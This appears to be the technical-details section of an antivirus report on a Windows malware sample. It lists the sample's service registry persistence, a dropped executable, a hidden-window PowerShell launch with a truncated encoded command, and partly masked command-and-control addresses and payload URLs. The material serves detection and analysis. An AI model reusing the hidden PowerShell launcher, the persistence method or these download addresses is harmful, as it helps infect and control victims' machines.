Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\exceavi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\exceavi] 'ImagePath' = '"%WINDIR%\SysWOW64\exceavi.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsAJABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoAYwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB...
- %HOMEPATH%\924.exe
- %HOMEPATH%\924.exe в %WINDIR%\syswow64\exceavi.exe
- '5.###.130.105':7080
- '91.##.197.90':80
- '68.##4.229.171':80
- http://www.be####lpinghand.com/wp-admin/tsh4/
- http://45.##.65.123:8080/KMmxpKWWNeN9S2Lb via 45.##.65.123
- http://21#.##0.19.232:8080/877BJ8feGhBKX2xE via 21#.#60.19.232
- http://17#.#.43.37:8080/forMMCN4oY09 via 17#.9.43.37
- DNS ASK be####lpinghand.com
- '%HOMEPATH%\924.exe'
- '%WINDIR%\syswow64\exceavi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsAJABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoAYwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB...' (со скрытым окном)